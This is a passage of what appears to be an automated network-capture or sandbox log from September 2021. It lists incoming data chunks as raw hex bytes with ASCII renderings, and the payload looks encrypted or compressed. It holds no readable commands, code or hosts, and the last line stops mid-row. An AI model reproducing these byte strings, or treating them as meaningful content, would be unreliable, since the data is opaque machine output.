                                                                        2021-09-28 06:15:57 UTC130INData Raw: d0 b0 13 98 7a c5 3c f3 d4 d6 96 57 d4 98 31 ad c0 61 34 7a 24 23 c6 8e 01 07 b2 21 4e 72 f1 cf d2 f4 02 00 b7 27 bc 36 20 8c e8 44 39 48 2b 37 1c 4a 15 ae 9c 0a 2e 4c 25 8a ca 6b 28 8b 2d b4 07 c4 b0 a6 bb b9 6c dc 42 f4 b2 ad e9 d2 1c 79 66 05 0b 9d a1 e3 47 6c fa 1d 4d 3a 25 04 64 a3 01 45 65 54 ac 03 f9 42 e9 3d ce 60 20 9c 44 33 4b c1 0b 56 21 09 8e f2 20 d7 e4 28 0e 01 ca dc f4 32 42 24 88 4e 6f 60 91 be 94 e2 c6 ca 7c e1 38 3b d4 e7 8d 2b 02 25 d1 1c da 68 53 67 91 f2 91 5c ca 11 a6 a8 4a cf b9 54 d8 cb ef c9 a8 59 f8 7d fc 35 13 0e e1 85 f7 6a 5d ae 1d d4 41 47 78 16 ac fe cb 1b d6 77 50 84 00 66 e6 1c 88 c0 df ac 43 d3 a5 bd a8 c2 67 ab ac c2 ef a9 a6 db b3 70 4e 8a eb e7 fd 10 2f 00 39 a5 c7 10 8b 86 68 a8 8a e5 00 1a d6 9b c6 db f2 7b ed bc 79
                                                                        Data Ascii: z<W1a4z$#!Nr'6 D9H+7J.L%k(-lByfGlM:%dEeTB=` D3KV! (2B$No`|8;+%hSg\JTY}5j]AGxwPfCgpN/9h{y
                                                                        2021-09-28 06:15:57 UTC131INData Raw: 99 6b ea ad 87 7b 3d 0a e9 6e 37 80 b8 28 4c 26 b7 8f 6e f7 43 60 59 e2 01 97 4b 70 ad 52 5c 86 41 15 50 a0 b8 73 3f 82 c5 68 a0 16 19 2c 9d 09 5a 8b b7 8b 9c ea ae 69 35 00 ea e4 05 8e ff f3 4c 5e 3d 44 d9 bf e7 8b cd d5 2d ac c1 f4 95 bc 02 fb cc f8 14 4b 65 54 8b ed df 00 f5 95 96 26 c3 ac 64 11 7c 41 fa 25 11 09 14 b4 32 67 67 0b a0 f4 4d 2c 54 c6 74 2c c8 38 b6 7c 23 aa 5c 06 b4 00 10 60 87 cd af 12 76 e6 fe 6b 5d 15 46 f0 0f d8 16 18 b3 d8 64 80 70 1b 25 5c c6 e5 1a f1 be f9 6c 4d 19 bc dc 3f 41 37 68 bf 9a 5f a6 53 94 81 ea 57 9d 81 bd ce 88 44 74 6a 11 5c 52 16 5f 93 a2 be c3 48 40 7f 92 6f 62 3b 1c 55 2c 86 fd 63 5f d4 1c 21 48 06 fe cd 72 c4 89 9f 2c 9d ef 0d 96 94 66 9e bb 77 a5 f8 a1 c1 1d 5f f0 15 65 2e 98 f6 79 91 39 0f de 10 5e 10 2a d4 d5
                                                                        Data Ascii: k{=n7(L&nC`YKpR\APs?h,Zi5L^=D-KeT&d|A%2ggM,Tt,8|#\`vk]Fdp%\lM?A7h_SWDtj\R_H@ob;U,c_!Hr,fw_e.y9^*
                                                                        2021-09-28 06:15:57 UTC132INData Raw: 47 df fb 9f 5c d5 05 a6 a8 4a cf b9 54 d8 cb ef c9 a8 59 f8 36 fc 35 13 0e e1 85 f7 6a 5d e5 1d d4 41 47 07 10 ac fe cc 1b d6 77 50 84 00 62 e6 1c 88 c0 df ac 0a d3 a5 bd a8 c2 67 a8 ac c2 a6 a9 a6 db b3 04 48 8a eb ef d8 15 00 02 3f 89 6f ec 6c 1e 69 ac ae 76 fc 1a d6 01 79 d3 ce 4c eb 2f 85 74 53 6d ba 4b 2b 6b d2 e2 41 c8 8e cf 0e 35 9b 7c 02 43 a7 66 ea 30 b4 09 32 f3 c0 f9 1d c4 fb cb 08 11 42 12 fc c6 cd c6 3e 26 1a f2 cd b2 14 35 28 a6 9d f2 34 cf b7 78 6f d8 6b ed 48 99 ec 71 d2 7e 9e 24 9d ff 9c 3b 3c 27 9e 99 12 d3 a9 f3 28 40 5e 01 08 1c 00 d4 d9 8a 1f 84 cd fb cf 3f fe 9a 96 65 f7 22 1d a9 bd de 95 85 52 af f5 c9 41 d3 7c d0 c7 36 be d8 59 0f d0 40 fd 8b ea 53 78 30 ec 8c 4a 5c 93 7e d9 7a 3b f0 98 d6 60 98 6e 2d 77 9d 70 74 9b 49 a9 72 a3 ce
                                                                        Data Ascii: G\JTY65j]AGwPbgH?olivyL/tSmK+kA5|Cf02B>&5(4xokHq~$;<'(@^?e"RA|6Y@Sx0J\~z;`n-wptIr
                                                                        2021-09-28 06:15:57 UTC134INData Raw: e6 17 c3 99 d9 bb 6d 50 ac fc d7 55 38 40 8d b9 77 8d 7b 16 f9 59 d0 e3 1c 9c ef 8d 64 ac f0 34 71 d9 15 52 a0 85 9e 1b 68 18 6f b2 66 70 13 31 48 0d a8 fa e7 21 4b 37 a7 32 bf dd cc 76 e4 ca ba 01 8f 53 08 99 87 40 be 42 17 b5 f8 81 f4 1b 77 dd 08 44 00 9f 76 07 0e 12 89 a4 a9 7c 11 2e f4 95 50 e7 88 0c ee a3 98 88 71 b3 eb ad 56 09 15 1e b5 4e b9 79 f1 f4 5c f2 f2 14 bd 70 0d 14 1f c1 c0 72 56 89 05 2e 5a 07 73 e0 d4 4b 6d da db 77 36 b4 d4 90 1c 71 9c 34 63 94 96 d3 52 a3 7a 45 04 36 ab c8 d3 9c cc 13 bb a1 84 d6 ba eb f6 e3 c4 23 fc dc 57 94 57 d2 28 92 fe 48 46 14 d2 04 05 c7 ae 50 95 97 0c 45 7c fc eb d3 f2 28 a6 4c ae bd 36 3b a1 6d 69 3b 48 b7 38 b7 26 aa 8f 31 0e 0e 6b 04 de c2 f1 0d b9 30 ba 0a e1 b1 a0 91 1b 80 55 43 f4 a9 84 6f ff 1e 79 fa 0a
                                                                        Data Ascii: mPU8@w{Yd4qRhofp1H!K72vS@BwDv|.PqVNy\prV.ZsKmw6q4cRzE6#WW(HFPE|(L6;mi;H8&1k0UCoy
                                                                        2021-09-28 06:15:57 UTC135INData Raw: 6a 77 69 94 ba 56 f2 80 04 01 b0 cd 85 15 7b 26 89 b1 1f 4d bb f5 02 dd 04 b0 24 1e 04 f2 0c 0c 61 1d 56 de e6 0e 90 bb 69 65 6d 07 10 fb 95 fe dd 9e 7a 82 d7 09 55 f9 fe b1 51 1f 93 de 79 09 fb c6 83 88 ce 7e 6d 36 85 8d 4b 5c 09 7b b0 66 1d d0 c9 ff 4d 9a 4e e4 4f 1b 0e f2 be 61 80 50 a2 c9 21 37 1d 18 05 49 ac 0f bb 6a 73 0c 05 58 4a 2f 48 91 37 94 22 1a b2 ed 67 18 ba 2f 11 07 da c7 8c 08 22 8b 70 cb 72 66 9e 87 ae ab e2 0d dc f2 af 05 b3 f8 67 3b 49 92 37 6c f8 bf b7 98 22 9a a2 89 68 66 30 a7 b7 de 5d fe df b9 38 cd 85 aa e3 18 21 d1 ce 69 55 b8 28 48 26 4e 9c 6e f7 c6 60 5c dd 25 b7 9e 5a 2b 2c e5 d0 4a 11 70 f2 9e 5b 12 1a e0 43 98 b6 47 f8 9d 09 5e 8b 2c 98 9c ea 2b 68 30 3f ce c4 d7 a4 79 8d f5 21 36 40 f9 ee c3 a3 e0 4d 08 87 f9 54 cb 6b 02 fb
                                                                        Data Ascii: jwiV{&M$aViemzUQy~m6K\{fMNOaP!7IjsXJ/H7"g/"prfg;I7l"hf0]8!iU(H&Nn`\%Z+,Jp[CG^,+h0?y!6@MTk
                                                                        2021-09-28 06:15:57 UTC136INData Raw: d8 7e ae 5d 44 02 1c b7 93 67 8f ea 37 be ce 85 d6 9a 0b c3 ce d6 1a d7 9a 7b 96 57 f4 86 01 80 d1 58 18 fe 09 21 c6 a8 7a 89 cc b8 56 5a d8 ed bd f3 28 86 53 9b 90 24 02 8c 2a 45 39 48 91 82 24 58 33 91 11 22 03 4e 05 d8 e8 ed 56 0d 23 9c 2e e6 c0 a1 91 3b 88 60 6e e6 90 ad 37 d3 1c 79 dc 90 33 8c 87 dc e4 44 d7 1f 6d 5f 07 82 1a 22 28 68 63 74 db 28 7f 3c ea 19 e3 76 26 13 35 32 4b 5b 0e c6 26 2f ae 42 2c ff c9 0a 6b 0f e0 5a 95 a2 6b 09 8e 6e 1b 4b 17 c0 97 c6 eb dc 7a 71 4a 3a d4 7d 88 cf 05 03 f1 b3 d0 40 7e 45 ff fc bb da ab 81 8f 85 4c ef cc 7f 5a b5 ec ed 85 4f fe ec 8f 34 13 94 e4 7b f3 4c 7d 00 16 fc 6c 65 0f 18 86 78 af aa fa 75 54 a2 5e e5 98 85 13 e5 f6 9e d7 f3 d1 bc 32 e7 6a 64 9f e2 5d b6 90 f3 be 09 46 8c c1 72 ab a4 2c 00 3b af 30 6f 12
                                                                        Data Ascii: ~]Dg7{WX!zVZ(S$*E9H$X3"NV#.;`n7y3Dm_"(hct(<v&52K[&/B,kZknKzqJ:}@~ELZO4{L}lexuT^2jd]Fr,;0o
                                                                        2021-09-28 06:15:57 UTC137INData Raw: ae 91 a7 92 b3 8f 8b 48 b2 0d 21 c9 5c 74 d3 d9 99 72 e6 07 d4 e0 3c 0c c7 c8 dc 18 b9 28 d2 23 49 9e 48 d7 4c 44 74 f0 07 60 8f 70 ad 4f 54 fc 48 15 56 95 1d 25 8b 81 c5 6a aa 06 66 b5 9c 93 7b 86 72 ad bc 7c 35 4c 18 32 12 d3 d1 8e e5 db 41 22 36 42 f3 26 bc 3a e1 d7 29 8a 7c 73 eb 25 99 de e5 ca e7 6b f2 55 11 c8 d2 f0 c4 b5 43 39 d3 84 69 b0 77 47 d0 bc 4b b8 38 b6 36 41 d5 8c de 6d d6 09 7d f4 84 0c 50 39 2c 59 2e 4a 6d 26 62 1f 1d 48 8a 08 a4 14 5c 7f a1 da 71 17 42 d6 bc 5f 68 81 28 fd 4d b2 81 3b bc 5d 5c c0 17 1c 8f d9 bb 52 16 94 d1 d5 4a 31 42 22 c5 ee 8a 51 90 a7 5a d0 e3 18 26 eb a1 75 8a 4a 8b 5d c8 33 52 8f 9c 9e 1b 50 68 52 b0 66 68 11 9a 34 94 af d0 65 7f 49 37 a7 36 05 da e0 64 c2 70 04 2d 9d 75 08 ab 9e 40 be 7d 6b 8d d5 83 eb 17 75 76
                                                                        Data Ascii: H!\tr<(#IHLDt`pOTHV%jf{r|5L2A"6B&:)|s%kUC9iwGK86Am}P9,Y.Jm&bH\qB_h(M;]\RJ1B"QZ&uJ]3RPhRfh4eI76dp-u@}kuv
                                                                        2021-09-28 06:15:57 UTC139INData Raw: e8 7c ea 39 3b d4 5d f7 1f 10 03 ec 84 f7 6a 53 41 d5 7c ef c5 d4 18 8a a5 f4 ce bf 7e c0 90 5b da 8e 7d 64 cd fc 35 33 f2 dd a8 e6 53 65 37 30 d6 41 61 25 9c d2 67 d0 33 ff 55 ed 83 2a e4 02 a0 a4 d1 fd ac 4c d2 a5 bd 12 99 53 ba 8a ff 75 84 a4 db 95 21 c4 f4 72 f1 d5 39 0d be 3e 8f 45 f4 37 aa 79 8a 8a e8 01 1a d6 21 66 ef e3 5d d1 27 54 76 53 6b b0 d1 5b f2 d3 fc 6d c5 33 ce 08 1f 87 27 b6 50 81 42 75 cc b4 09 12 e2 fc d4 0f fd d2 1e 25 13 42 34 f2 4e b3 5f 20 3d 36 ff 0f b3 12 1f 30 fd 29 e1 12 eb 57 87 6f d8 4b e3 74 b4 fd 48 de a8 b3 26 9d d9 89 b7 42 be 88 b1 3b f1 68 f4 02 c2 ba bd 24 0d 22 d4 e7 8b 1f 84 77 1e fb 2e d8 a4 41 48 f5 22 3b c3 31 a0 0c 9e 7a 86 d7 0b 46 f9 fe 34 7b 1a af fa 59 cd d0 40 fd 31 07 67 69 16 d2 a4 66 5e 93 58 b7 f2 45 69
                                                                        Data Ascii: |9;]jSA|~[}d53Se70Aa%g3U*LSu!r9>E7y!f]'TvSk[m3'PBu%B4N_ =60)WoKtH&B;h$"w.AH";1zF4{Y@1gif^XEi
                                                                        2021-09-28 06:15:57 UTC140INData Raw: 3a 57 d0 05 bc 69 81 b2 f8 32 bb a7 1b 38 74 71 c2 37 e5 b2 5f c5 d4 18 bc f8 f7 a9 36 68 a0 21 52 a6 43 b2 a7 23 d0 e3 18 9c 97 97 64 ac 75 04 74 e5 31 72 87 ae 18 65 d1 41 7f b6 46 8a 3a 1c 4a 97 8b fd 73 79 f2 d2 a6 36 9f df a3 6d e4 50 80 25 b5 58 2a bb 80 6a 38 1c ee a4 f8 85 cb f4 5e f0 0a de 23 98 e6 5f b7 f6 88 a0 89 7f 67 35 f4 0f 6a c0 b1 07 cc 80 9f a2 f7 ed 18 bc 56 0d 28 d0 99 4c b9 e5 fe 5f 30 4d d3 f2 b8 50 29 35 9e da 5a 57 64 90 0b 23 7c 06 75 ca 76 44 e4 db db 6c 1f 7b f8 92 1c ed 93 9f 0c 2b b7 34 57 83 5f 64 88 2d 31 ed e2 a6 c7 31 9e a6 ae 54 e4 08 e7 e3 c0 1c 1f f5 7a 96 cd f1 2f 05 a6 f1 af 15 d6 24 03 54 b5 50 0f af 09 7a 58 dc cb f8 74 56 1f c8 be b9 16 cd ad 45 44 a3 6d 9c 00 17 78 da 8f 31 0a 0e d5 1e de c2 74 22 bc 0f 9e 2a c0
                                                                        Data Ascii: :Wi28tq7_6h!RC#dut1reAF:Jsy6mP%X*j8^#_g5jV(L_0MP)5ZWd#|uvDl{+4W_d-11Tz/$TPzXtVEDmx1t"*
                                                                        2021-09-28 06:15:57 UTC141INData Raw: 1f cd e9 92 1b 1d aa d8 24 f2 29 cb 97 99 64 f0 46 75 6d b2 d7 d1 8c 19 9f 24 99 ff a9 37 3c 27 13 94 12 c3 8f d5 08 c0 20 98 29 10 19 f4 26 95 13 ac 7a dc e2 28 f2 3c 17 fc f6 22 39 c9 b8 dc 95 9f e0 a7 da db 61 d9 f5 ac 5e 37 9e c4 64 0f d1 5f f0 39 e2 7c 69 10 e6 0a 35 c5 92 5e 99 54 37 f2 80 fe d7 bf 43 39 7b 3b 02 ef 9a 49 8d 77 bf cf 0b ae 6d a9 29 4b a8 29 db ed 0d 95 9e 7d 63 1d 63 b3 7d 95 b8 3f bf 0c 53 38 b7 32 02 2f d7 f6 91 0e 08 12 1c 7a 5e 64 9a a1 cf 2c 9c 94 47 d7 86 37 9b da 2c 3a d3 b7 3a 78 cd 9f b9 85 06 b2 af ce 75 60 1a 3e da 6f 71 fc db 9f 5e 4a fb 33 78 3d 08 e3 e7 4b 19 b9 b2 6d 2b 76 a9 4e f8 db 45 74 d0 7f aa 98 70 b2 44 54 fc 48 15 56 95 19 25 8b 81 c5 6a aa 80 65 b5 9c 93 7b 86 71 ad bc fa 36 4c 18 32 a2 d9 d1 8e e0 e4 44 0d
                                                                        Data Ascii: $)dFum$7<' )&z(<"9a^7d_9|i5^T7C9{;Iwm)K)}cc}?S82/z^d,G7,::xu`>oq^J3x=Km+vNEtpDTHV%je{q6L2D
                                                                        2021-09-28 06:15:57 UTC143INData Raw: 3b 7d de fb 58 3d 9c f9 08 39 5a a4 94 3d 3d 95 d3 56 a3 fc 64 04 36 2e e0 d6 a3 e8 33 98 8a 02 a8 03 90 e6 e7 e4 0d f5 f4 7a 0c 72 f9 10 32 a0 e0 45 14 d6 04 93 e6 ae 50 10 b9 09 7a 58 dc cb f8 70 56 1f c8 be b9 16 16 ae 45 44 a3 6d 9c 03 17 78 01 8c 31 0a 0e f7 25 de c2 76 00 b9 20 9c 2c ec 36 de 08 3a 12 41 63 c7 b4 8d 47 48 39 54 ee 06 06 bf 85 c3 e9 4c 38 3d 6d 59 32 35 4c 96 2b 68 61 7e 2c 57 e6 3d 70 38 ee 50 02 33 44 a9 6e 76 3c 5d 13 1b ac 5d 20 f7 17 28 6b 09 d5 d6 c3 16 68 09 8c 64 ef 34 8e c1 0d e7 e6 fb 5e 51 38 a1 f1 50 ba 20 30 36 f3 ac da 48 ae 67 ff fa 8e 73 fd 35 8c 85 4e e5 39 00 c3 b4 76 cc 88 6b da cc fc af 36 b9 d6 8e c6 7a 7f 1f 1d f4 6d 46 0f 1e b3 f5 f9 1e f9 75 56 a8 ac 9a 01 84 89 c4 fb bb f3 d3 a5 27 17 ca 58 9c aa d5 5f a9 a6
                                                                        Data Ascii: ;}X=9Z==Vd6.3zr2EPzXpVEDmx1%v ,6:AcGH9TL8=mY25L+ha~,W=p8P3Dnv<]] (khd4^Q8P 06Hgs5N9vk6zmFuV'X_
                                                                        2021-09-28 06:15:57 UTC144INData Raw: a8 e2 0b 6c 51 fc 8e 94 d8 28 1a 1e 90 17 6a 71 9a 9a 95 20 92 d8 89 68 60 3a 70 ea 47 5c e1 cb b1 59 ce 85 ac 53 bb 72 5a e9 49 1d 99 70 4a 06 64 15 4b da cb 63 54 a8 25 b7 98 50 cc 71 7c d1 55 0d 78 92 9d 5b 14 aa 43 10 13 91 67 b1 bc 50 5c ab 63 11 b9 c7 26 6a 38 4b ce c4 d1 ae 86 d0 6c 20 29 4b f1 8d c0 a3 e6 fd af d4 72 73 eb 21 23 a1 ca d8 c1 d1 40 79 00 ee d2 48 d1 b5 43 06 4b 8f 44 b2 69 69 d7 38 35 27 13 30 4c f8 4c 8d da 4d 17 2e 50 e6 38 09 e5 2a 0a 79 55 ba 7a 26 42 90 33 60 a7 15 bc 3a 5b fb df 45 5a 95 38 6f 24 5e 6c a1 ee da 60 a0 3d 3e 08 4d 7a e0 6b e1 98 d9 9b e5 3a bc fc cd 62 1a 6a a0 bd 5d 09 2f 0d 86 c0 d5 c3 45 be ce 8c fe 89 47 00 7a e8 6e 70 81 84 be b7 6b 40 7f ac 4e 43 39 1c 4c 27 28 ae f8 5e d2 32 87 68 9d ff cd ec c1 7d 8d 0a
                                                                        Data Ascii: lQ(jq h`:pG\YSrZIpJdKcT%Pq|Ux[CgP\c&j8Kl )Krs!#@yHCKDii85'0LLM.P8*yUz&B3`:[EZ8o$^l`=>Mzk:bj]/EGznpk@NC9L'(^2h}
                                                                        2021-09-28 06:15:57 UTC145INData Raw: 09 ea 4b ce 3b 6a 1e a2 63 6b 4a 11 ea 8b 9d 5f cf 5c 55 18 45 d6 7d a8 9c 35 2e e3 8a fa 16 51 47 ff da 09 79 d5 18 91 8a 60 e2 bd 7e 5c 9f f0 b6 31 5c d8 c8 dc 4a 11 94 c4 32 c3 61 6f 39 3d ab 43 67 0f 3e 0b db d1 33 e4 7b 78 af 28 e4 9e af 0f be 42 8d f1 d7 85 3d 30 e7 4a 20 af cf 4f 8f 86 5b 91 0b 46 aa 5e d5 d5 3d 32 1c 17 a2 47 6e 14 ad ee d2 33 57 00 1e f6 80 e1 f6 e3 c7 e8 22 6b 52 73 ec 98 57 25 4b 03 d9 69 e5 93 d2 20 32 1f 02 9d 68 21 1c 53 cc b4 0d 12 eb e7 d4 0f 78 fe 1b 1a 37 62 b0 da c8 cd e6 cf 18 32 df d0 bf 3a 32 a8 d8 02 d9 b2 b5 0e 87 6f dc 4b f4 6f b4 fd cd d7 ad 8c 02 bd 5c a1 35 3c 07 72 94 3f d1 b6 e1 2a ef 22 98 0f 36 82 8a bf 8b 1f 80 77 5a e0 2e d8 20 4c 48 e5 04 1d 6d b1 de 95 bf 75 a4 f7 c9 58 ed d6 83 5c 37 b8 f6 ff 71 48 41
                                                                        Data Ascii: K;jckJ_\UE}5.QGy`~\1\J2ao9=Cg>3{x(B=0J O[F^=2Gn3W"kRsW%Ki 2h!Sx7b2:2oKo\5<r?*"6wZ. LHmuX\7qHA
                                                                        2021-09-28 06:15:57 UTC146INData Raw: 3b 48 b1 32 95 7e 33 8e 26 22 03 4e 05 d8 e8 e9 56 0d 23 9c 2e e6 24 a2 91 3b 88 60 6e e5 90 ad d3 d0 1c 79 dc 85 00 8c 87 db c1 41 f8 1d 6b 73 af 7a fd ba 29 6c 47 c1 a8 29 7f a6 55 11 df 42 20 a6 46 33 4b 7b 89 5d 33 2f b9 75 0d d5 e4 0e 41 8b b4 45 ea 3b 6e 29 1c 4c 69 4a 8d e5 20 f2 e0 ee ca 53 38 3b f4 d5 8e 06 10 1b d9 81 d8 68 55 6d 7d 84 08 5d d5 1c ae 12 4a cf bf e4 7f 98 67 ee 88 ca da cc fc 15 b9 b2 c4 a8 f1 64 50 1d 1d d2 6b e5 71 87 ad fe d5 13 63 77 50 82 b0 c1 b5 94 af e0 43 8e f1 d3 85 16 14 e7 4a a2 a2 cf 5f a9 a0 f1 11 75 df 8b eb f4 f5 a4 2f 00 3f 15 60 43 03 a1 48 35 a8 56 00 3a 7b 27 e3 f6 f4 75 e0 0d 79 72 79 ef e4 ce 24 6b d6 dc f3 e7 8c cf 92 3a 30 13 bd 62 3d 60 ca cd 94 a7 14 69 e5 cc 27 cf d9 36 0e 3b c0 4c 41 c9 cd c2 01 a6 30
                                                                        Data Ascii: ;H2~3&"NV#.$;`nyAksz)lG)UB F3K{]3/uAE;n)LiJ S8;hUm}]JgdPkqcwPCJ_u/?`CH5V:{'uyry$k:0b=`i'6;LA0
                                                                        2021-09-28 06:15:57 UTC147INData Raw: 40 b5 9c 16 57 83 4e 89 9c ec 1e ca 66 8b cd c4 d5 ae 44 f1 6c 20 ac 61 f4 b2 e4 83 5b d5 2d aa cb 85 cc 25 03 e4 c7 f0 ec 49 65 52 3b 4e 8c 8b d2 b5 47 06 7f ae 44 b2 ed 64 d7 28 13 01 85 b4 32 61 6d 8b f6 6d 4c 33 46 ce 8f 2e c8 3e 06 df 70 21 7b 26 66 20 ad 62 a7 0a 3e 37 5b eb f9 63 cd 15 46 f6 05 42 40 81 b2 c7 6e 88 8a 19 25 5a 76 42 49 7a 99 d9 bf 6d a7 be fc d7 d0 12 45 b1 9d 57 35 53 94 87 e0 fb cb 18 bc d5 a4 49 ae 6a 17 76 4e 4d eb 80 84 9a 3b f7 42 7f b2 fc 4b 16 0e 6c 2d 11 d2 61 5f f2 19 8f 36 9f e0 c3 5e c9 52 9f 2a b7 f7 56 22 87 40 ba 42 b7 a7 f8 81 71 34 72 e1 2c 64 c6 b7 f4 79 b7 2e a1 a0 89 41 38 03 f6 0f 73 e0 1b 54 57 81 99 8c 51 52 83 bd 56 93 2d 1b 89 6a 99 be d9 72 22 4b b6 3c b9 50 37 3d 32 c3 5a 51 51 1d 5d 97 7f 06 77 c0 36 38
                                                                        Data Ascii: @WNfDl a[-%IeR;NGDd(2ammL3F.>p!{&f b>7[cFB@n%ZvBIzmEW5SIjvNM;BKl-a_6^R*V"@Bq4r,dy.A8sTWQRV-jr"K<P7=2ZQQ]w68
                                                                        2021-09-28 06:15:57 UTC148INData Raw: 18 0f c9 8a a3 a9 21 d9 8c f1 f3 c4 96 32 e7 55 9e a2 cf 5f a9 a0 f1 11 75 df 8b eb f4 f5 df 2f 00 3f 15 60 43 03 a1 48 4e a8 56 00 3a 53 2a e3 f6 fb 75 e0 0d 79 72 79 ef e4 ce 24 6b d6 dc 8a e7 8c cf 92 3a 30 13 bd 62 44 60 ca cd 94 8e 19 69 e5 ca 27 cf d9 36 0e 3b c4 4c 41 c9 cd c2 01 d9 30 df cf 28 37 32 b8 fe 24 17 36 cb 97 a6 e0 f3 6b 77 72 bf d5 7a f0 80 98 0e 1f a1 3a 34 3c 23 a9 54 3d d1 a9 6f 27 ef 31 be 29 f9 06 f4 26 aa 85 af 57 de fc 06 f5 b8 69 63 dd a4 43 70 b2 de 91 bf 9c 80 f7 c9 dd dc d3 bc 78 17 58 de 79 0f f1 e2 d6 11 cf 61 43 3e e1 8e 4b 5a b9 d8 e3 ed 3a f0 84 de aa 98 6e 2b c7 3e 23 ff bc 69 4a 50 a2 cf 2b 7d 48 81 04 56 be 07 dc 69 73 0a b5 fb 19 a4 6f b1 79 b5 ca 18 92 1e ef 3d 97 22 24 0f 1f c7 8c 0e 28 ef 25 52 73 79 90 8f c8 a8
                                                                        Data Ascii: !2U_u/?`CHNV:S*uyry$k:0bD`i'6;LA0(72$6kwrz:4<#T=o'1)&WicCpxXyaC>KZ:n+>#iJP+}HVisoy="$(%Rsy
                                                                        2021-09-28 06:15:57 UTC150INData Raw: 46 66 38 1c 4a 97 8b fd 70 79 f2 3e a4 36 9f df 9b 5b e4 50 83 04 b0 77 28 bd ac c6 c0 fb 76 a5 fc a1 e2 12 5f f0 90 61 2b a7 d2 59 9e 10 89 a0 a9 03 3d 2e f4 10 47 e2 b4 28 ce 86 b3 0e 0f 0a 80 bd 52 29 02 35 98 4c 23 5a f6 60 04 4b f9 17 b9 50 09 9b 32 c1 5a 48 60 b3 0e 0c 7e 00 59 66 8a a3 7c da df 48 34 9f f9 92 86 52 9b a0 3b 2d 9c d0 56 83 7f ed 29 36 31 f2 d7 a6 c7 31 9e a6 ae 50 e4 08 e7 e3 c0 1c fb f7 7a 96 cd f1 2f 06 a6 f1 4b 17 d6 24 03 14 83 50 0f ad 10 7f 77 de cd d4 d8 ae f8 50 bf bd 32 04 a1 46 44 39 d2 94 3f 23 7e 13 83 32 0a 2e 6c 06 f0 c2 6b 37 b6 0a b1 28 c6 b6 8a 17 45 8b 44 43 f0 96 83 44 d2 1c e3 d9 0d 34 aa a7 cd ea 6c fa 3d 48 77 2d 04 7b a0 01 45 65 54 ac 03 fd 42 e9 3d ce 60 20 3c 47 33 4b c1 0b 56 22 09 8e 52 23 d7 e4 28 2b 27
                                                                        Data Ascii: Ff8Jpy>6[Pw(v_a+Y=.G(R)5L#Z`KP2ZH`~Yf|H4R;-V)611Pz/K$PwP2FD9?#~2.lk7(EDCD4l=Hw-{EeTB=` <G3KV"R#(+'
                                                                        2021-09-28 06:15:57 UTC151INData Raw: e7 7d 3c 3c 5d 4a f9 02 04 0a 83 32 2d 71 97 ea 63 43 93 c0 09 80 6e ef 1f a5 bb 98 59 49 93 92 6f bc 7e b6 d7 1f 66 0b a2 75 87 dc ac e0 f9 19 50 b8 54 ba 48 3c ea 44 ae 5a fa be 4f aa 69 ec fc 96 2c c6 e3 b1 e9 3e eb 00 e5 b0 23 b8 cd 95 31 bc 98 bd 7e 61 1a 8c 8a 92 96 c8 da fb 38 01 48 0b 5a b2 c7 7a 20 b3 71 78 9f 8e e4 27 bf c6 17 4e 4d 3d af 10 29 28 dc c4 e8 d0 7a 19 07 a6 93 c4 28 97 c7 fa 3e 38 7e b1 80 3f 70 e6 7d 17 4b 32 e7 20 a3 9f 13 07 ad 7e f3 c9 02 c2 2d 36 a1 30 7f 2f fd ed 3d 60 e0 e3 2b fc fa 0a dd e1 62 0f c4 1a e4 ef d9 77 32 68 71 af b0 c9 80 cb d5 72 2a 28 48 9b 90 d6 a3 e4 dc 2c 96 f0 67 f7 39 05 a4 f6 d7 dc 4f 66 40 15 e6 e7 09 fd 9b 73 33 d4 82 66 9b 50 7a f8 09 1c 11 0e 96 1a 66 40 a7 e5 40 30 35 63 c1 93 34 ec 06 1c 65 d1 7e
                                                                        Data Ascii: }<<]J2-qcCnYIo~fuPTH<DZOi,>#1~a8HZz qx'NM=)(z(>8~?p}K2 ~-60/=`+bw2hqr*(H,g9Of@s3fPzf@@05c4e~
                                                                        2021-09-28 06:15:57 UTC152INData Raw: d5 da 2b 1e 0a 19 ca 62 6e 53 5d d7 c0 43 a7 a3 dd e1 5c e6 d3 f8 f2 79 c6 f1 9f 99 fc 29 3f 8f d0 64 dc 6d cd 70 2f 25 08 92 d3 dd c3 66 70 18 d4 58 90 f8 60 ff f0 12 5e 61 52 f1 73 8e c2 fd b3 80 cf 3b b3 d0 de ff 13 da 95 a0 d2 8d 79 f1 93 b9 a6 c6 bc b6 db 93 c4 c1 5f b0 ad 4a 64 8c 91 fa 2f 4a 5f 61 31 4d ca 03 27 12 53 8d 40 ec 9f c5 0c 02 6a 2c 89 2a e3 55 02 4a be f2 8c 36 01 1e ac ab c0 70 f8 71 ea fb 7c ff 94 10 2d 8e 49 e8 c8 2d e6 f0 96 58 65 fe e0 f7 94 2e 07 6a 68 e2 02 16 62 00 fd b6 84 3b fb 77 49 c0 2a eb 95 8c 9c 99 9c d5 ba 9b be f2 2f fa 15 f6 c5 f0 12 84 f1 93 c9 23 33 e2 9e dc a4 2c 5c 6d 1e f1 24 14 33 ac 43 82 d1 6d 36 28 e6 2f 83 86 93 3d ac 69 1e 10 36 e5 0f d7 a5 f9 52 36 ab 29 5b 51 95 96 dc c9 50 8c 22 9c 12 1f 78 d0 b3 bd 39
                                                                        Data Ascii: +bnS]C\y)?dmp/%fpX`^aRs;y_Jd/J_a1M'S@j,*UJ6pq|-I-Xe.jhb;wI*/#3,\m$3Cm6(/=i6R6)[QP"x9
                                                                        2021-09-28 06:15:57 UTC153INData Raw: 0a f0 85 22 b9 f3 e3 4c 61 a1 ea 66 6d a6 42 48 be 39 12 d3 85 6b be 10 3b 3d e1 d5 c1 c7 51 53 46 04 3e 6c fe bc b1 c6 47 3a 09 31 7a 73 92 42 41 d3 48 86 bc 04 29 3b 30 bd c0 f1 e2 24 0b f4 71 28 c8 a8 52 03 ab 4d c0 f8 43 9a de 5c 7b f0 7f 20 15 d2 d3 1d 2b 5c 12 b2 e0 6c 88 6c 63 08 56 ea 35 75 33 5b 40 29 f4 50 fc 44 31 97 b3 28 11 6b 26 97 4d 27 10 fa 83 a3 1a d9 e1 6e 4e 3d 11 b1 6b 90 e8 bb dd 29 6d e2 8a b0 37 2e 6b a9 e7 28 d6 7e 96 95 da e2 fb 0d af cf 84 5a a5 7b 1e 47 eb 18 5c 90 85 87 1a 4a 19 58 af 49 49 1f 07 61 25 b0 f8 42 78 f5 43 d1 40 d6 b0 9a 27 89 39 f3 53 cc 22 77 e2 e3 21 d8 15 62 94 36 49 2b d9 85 00 cf 8d c7 77 24 ac 58 db 43 2a 40 81 c6 f3 0e df aa 02 46 fc 10 45 4b 50 a6 53 66 53 b0 f4 ab 94 39 ec 16 